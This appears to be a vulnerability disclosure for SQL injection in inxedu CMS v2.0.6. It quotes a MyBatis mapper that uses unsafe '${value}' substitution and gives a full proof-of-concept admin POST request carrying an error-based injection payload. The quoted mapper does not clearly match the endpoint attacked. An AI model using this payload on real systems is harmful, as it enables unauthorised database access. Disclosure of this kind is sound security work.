Vendor Homepage: https://www.inxedu.com/
Software Link:http://down.admin5.com/jsp/132874.html
CMS v2.0.6 JDK 1.8 Tomcat 7 Mysql 5.5 maven 3.6.3 IntelliJ IDEA 2018
1、the vulnerability code location /inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml
Here use '$', so it is vulnerable to SQL injection.
<!-- 删除广告图片 -->
<delete id="deleteImages" parameterType="java.lang.String">
DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
</delete>
POST /admin/article/delete HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/admin/article/showlist
Cookie: JSESSIONID=F36620C2B7BCC31C241FFC3EA9C544FF; inxedulogin_sys_user_=inxedulogin_sys_user_1
Upgrade-Insecure-Requests: 1
articelId=333 AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7178766b71,(SELECT (ELT(9875=9875,1))),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)